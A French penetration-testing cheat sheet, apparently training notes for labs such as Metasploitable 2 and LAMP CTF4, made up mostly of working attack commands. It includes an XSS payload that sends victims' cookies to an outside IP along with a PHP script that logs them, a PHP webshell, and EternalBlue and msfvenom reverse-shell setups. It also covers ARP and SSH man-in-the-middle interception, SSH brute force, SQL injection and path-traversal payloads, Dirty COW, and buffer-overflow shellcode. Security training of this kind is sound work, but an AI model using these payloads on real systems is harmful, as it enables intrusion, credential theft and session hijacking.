theHarvester : theharvester -d <domaine> -b allCopier/coller dans un shel

1. theHarvester :
2. theharvester -d <domaine> -b all
3.  
4. Copier/coller dans un shell gnome : ctrl+shift+C/ctrl+shift+V
5.  
6. https://haveibeenpwned.com/
7.  
8. Recherche de sous-domaines (passif)
9. subfinder -d <domain> -t 100 -v
10.  
11. Recherche de sous-domaines par bruteforce (actif)
12. fierce -dns <domain>
13. # possibilité de lui donner une autre wordlist
14.  
15.  
16. Suffixes DNS (Top Level Domain)
17. https://github.com/rbsec/dnscan/blob/master/suffixes.txt
18.  
19.  
20. Transfert de zone
21. Réponse : dig -t axfr @<serveur dns> <domaine>
22. 1) dig -t axfr @<serveur dns> <domaine> | grep -Ei "xp|2003|2k3"
23. 2) dig -t axfr @<serveur dns> <domaine> | grep -i "tpe"
24.  
25. https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/
26.  
27. Nmap :
28. nmap -sSVC -O -p- -v --open -oA nmap-output <target>
29.  
30. Énumération SMTP
31. https://github.com/pentestmonkey/smtp-user-enum
32.  
33.  
34. apt-key adv --keyserver keyserver.ubuntu.com --recv-keys ED444FF07D8D0BF6
35.  
36. ARP Cache Poisoning
37. sur une machine :
38. arpspoof -t <ip victime> <ip gateway> -r
39. sur le réseau :
40. arpspoof -i <interface (eth0)> <ip gateway>
41. Bettercap :
42. wget https://github.com/evilsocket/bettercap/archive/v1.6.2.zip
43. unzip v1.6.2.zip
44. apt install libpcap-dev
45. cd bettercap-1.6.2/
46. gem build bettercap.gemspec
47. gem install bettercap*.gem
48. cd bin
49. ./bettercap
50.  
51.  
52. Mitigation :
53. sur la machine (linux) :
54. arp -s <ip gateway> <adresse mac>
55. sur le réseau (commutateur) :
56. Dynamic ARP Inspection
57.  
58.  
59. Bruteforce SSH :
60. patator ssh_login host=<IP Target> user=FILE0 password=FILE1 0=/usr/share/wordlists/metasploit/idrac_default_user.txt 1=/usr/share/wordlists/wfuzz/others/common_pass.txt -x ignore:mesg='Authentication failed.'
61.  
62.  
63. Metasploit
64.  
65. exploitation MS17-010
66.  
67. msfconsole
68.  
69. search ms17
70.  
71. use exploit/windows/smb/ms17_010_eternalblue
72.  
73. set rhost <ip target>
74.  
75. set payload windows/x64/meterpreter/reverse_tcp
76.  
77. set lhost <ip attaquant>
78.  
79. run
80.  
81.  
82. Wordlist Weakpass
83. https://weakpass.com/download
84.  
85.  
86. Comparatif génération hash
87. https://gist.github.com/epixoip/a83d38f412b4737e99bbef804a270c40
88.  
89. Correction Metasploitable 2
90. https://metasploit.help.rapid7.com/v1.1/docs/metasploitable-2-exploitability-guide
91.  
92. XSS - récupération du cookie
93. <script>window.location="http://172.16.110.162:81/vuln.php?c="+document.cookie;</script>
94.  
95. vuln.php :
96. <?php
97. if(isset($_GET['c']) && is_string($_GET['c']) && !empty($_GET['c'])) {
98. $referer = $_SERVER['HTTP_REFERER'];
99. $date = date('d-m-Y \à H\hi');
100. $data = "From : $referer\r\nDate : $date\r\nCookie : ".htmlentities($_GET['c'])."\r\n------------------------------\r\n";
101. $handle = fopen('cookies.txt','a');
102. fwrite($handle, $data);
103. fclose($handle);
104. }
105. // et on envoie la cible où l'on veut pour détourner son attention ;)
106. ?>
107.  
108. bypass filtre XSS :
109. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
110.  
111. encoder en base64 :
112. echo -n "<script>alert(1)</script>" | base64
113.  
114. Afficher les tables
115. ' union select table_name, table_name from information_schema.tables-- -
116.  
117. Afficher les colonnes
118. ' union select column_name, table_name from information_schema.columns-- -
119.  
120. SQLMAP
121. sqlmap -u "172.16.110.135/index.html?page=blog&title=Blog&id=2*"
122.  
123. * : point d'injection
124.  
125. sqlmap -r <request_file>
126.  
127.  
128. LAMP CTF4
129.  
130. Solutions / explications :
131. Lors de l'accès à la page Contact, on remarque une erreur "contact.php doesn't exist" -> .php rajouté automatiquement
132. page=../../../../../etc/passwd%00 pour récupérer la liste des utilisateurs
133. dans la page Blog, parametre id vulnérable à l'injection SQL :
134. - '
135. - 5 - 2 (accès à la news 3)
136. - order by 10-- -
137. - order by 5-- -
138. dans robots.txt accès au dossier sql et accès à l'architecture de la bdd
139. - union select 1,2,3,4,5-- -
140. - union select 1,2,3,user_name,user_pass-- -
141. - ssh achen@ip -> mot de passe du md5
142. - élévations de privilèges :
143. - sudo su (utilisateur sudoer)
144. - exploit noyau
145.  
146. ---------------------------------
147. Reconnaissance active :
148. sudo nmap -sSVC -p- -A -T4 -vvv -n <IP_target> -oA <file_output>
149.  
150. Crawling des réperoires :
151. dirbuster
152. - rentrer la target
153. - selectionner une wordlist dans /usr/share/wordlists/dirbuster/
154.  
155. Scan de vulnérabilité WEB :
156. nikto -h <target>
157.  
158. Sqlmap :
159. - dans Burp Suite, copier dans un fichier la requête contenant des paramètres (GET ou POST)
160. - sqlmap -r <fichier contenant la requête> : permet d'identifier si un paramètre est vulnérable
161. - sqlmap -r <fichier contenant la requête> --dump : si un paramètre est vulnérable, permet d'exploiter l'injection SQL et dumper le contenu des tables et colonnes de la base de données
162.  
163. Webshell PHP :
164. <?php
165. if(isset($_REQUEST['cmd'])){
166. $cmd = ($_REQUEST["cmd"]);
167. system($cmd);
168. echo "</pre>$cmd<pre>";
169. die;
170. }
171. ?>
172.  
173. Webshell PHP avec Weevely :
174. 1. générer notre webshell
175. weevely generate <password> <fichier_webshell>
176. 2. uploader le webshell ou copier son contenu dans un formulaire d'upload
177. 3. accéder au webshell
178. weevely <url vers notre webshell> <password>
179.  
180.  
181. Générer un payload reverse_tcp en PHP + se mettre en écoute
182. msfvenom -p php/meterpreter_reverse_tcp LHOST=<votre IP> LPORT=<votre port d'écoute> -o <fichier_php_reverse_tcp.php>
183. msfconsole -x "use exploit/multi/handler;set payload php/meterpreter_reverse_tcp;set LHOST=<votre IP>;set LPORT=<votre port d'écoute>;run"
184.  
185.  
186.  
187. Exploit :
188. msfconsole
189. search <service> <version>
190. use <exploit>
191. options
192. set RHOST <IP_target>
193. set .........
194. show payloads
195. set payload <payload>
196. set lhost <votre_IP>
197. run
198.  
199. Solutions Metasploitable2 : https://metasploit.help.rapid7.com/v1.1/docs/metasploitable-2-exploitability-guideroot
200.  
201. Dirty Cow (Exploit Kernel) :
202. Télécharger dirty cow : https://www.exploit-db.com/exploits/40839/
203. Compiler dirty cow :
204. gcc -pthread <fichier dirtycow.c> -o dirtycow -lcrypt
205. En 32bits :
206. gcc -m32 -pthread 40839.c -o dirty -lcrypt
207. Uploader dirty cow sur la machine cible
208. Exécuter dirtycow :
209. ./dirtycow <newpassword>
210. Un utilisateur s'appelant firefart se crée avec comme mot de passe : la valeur mise dans <newpassword>
211.  
212. Tester sa configuration SSL ou TLS :
213. apt install testssl.sh
214. testssl <url target>
215.  
216.  
217. Man in the Middle (interception) SSH :
218. git clone https://github.com/jtesta/ssh-mitm
219. cd ssh-mitm
220. # installation des dépendances
221. bash install.sh
222. # mise en place des règles iptables
223. bash start.sh
224. # man in the middle (ARP Cache Poisoning)
225. arpspoof -i <interface réseau> <IP serveur SSH légitime>
226.  
227.  
228. - attendre qu'une personne (victime) se connecte au serveur SSH (celle-ci va alors initier une connexion vers le serveur SSH illégitime avant d'être rediriger vers le serveur SSH légitime)
229. - une fois que la victime s'est connectée au serveur SSH -> cat /var/log/auth.log (afin d'identifier le mot de passe en clair)
230. - les sessions sont sauvegardés dans le fichier /home/ssh-mitm/sessions*.txt
231.  
232. # restaurer les règles iptables
233. bash stop.sh --force
234.  
235.  
236. Bettercap (ARP Cache Poisoning)
237. apt-get install bettercap
238. bettercap -X --proxy -O bettercap.log
239.  
240. Élévation de privilèges :
241. - sudo su
242. - exploit kernel
243. - escape shell : https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells
244.  
245.  
246. Dictionnaire de mots de passe :
247. https://weakpass.com/download
248.  
249.  
250. Identifier les programmes SUID :
251. - find / -perm -4000 -user root 2>/dev/null
252.  
253. Identifier les programmes GUID :
254. find / -perm -2000 -user root 2>/dev/null
255.  
256.  
257. Installer PEDA :
258. git clone https://github.com/longld/peda.git ~/peda && echo -e "source ~/peda/peda.py\nset disassembly-flavor intel\nset follow-fork-mode child" >> ~/.gdbinit
259.  
260. Shellcode :
261. ./chall_md5 $(python -c 'print "\x90" * 116 + "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80" + "\x2f\xf8\xff\xbf"') a
262.  
263. NOP * 116 + SHELLCODE + EIP (qui vient taper sur une adresse contenant un NOP)
264.  
265.  
266.  
267.  
268. Sites d'entrainements :
269. - https://www.zenk-security.com/
270. - https://www.root-me.org
271.  
272.  
273. Veille :
274. twitter -> #infosec
275. Podcast sécu : https://www.nolimitsecu.fr/
276.  
277.  
278.  
279.  
280. Manip Jo
281.  
282. https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
283. https://www.cvedetails.com/vulnerability-search.php?f=1&vendor=&product=&cveid=CVE-2017-0144&msid=&bidno=&cweid=&cvssscoremin=&cvssscoremax=&psy=&psm=&pey=&pem=&usy=&usm=&uey=&uem=
284.  
285.  
286. http://www.filedropper.com/newfile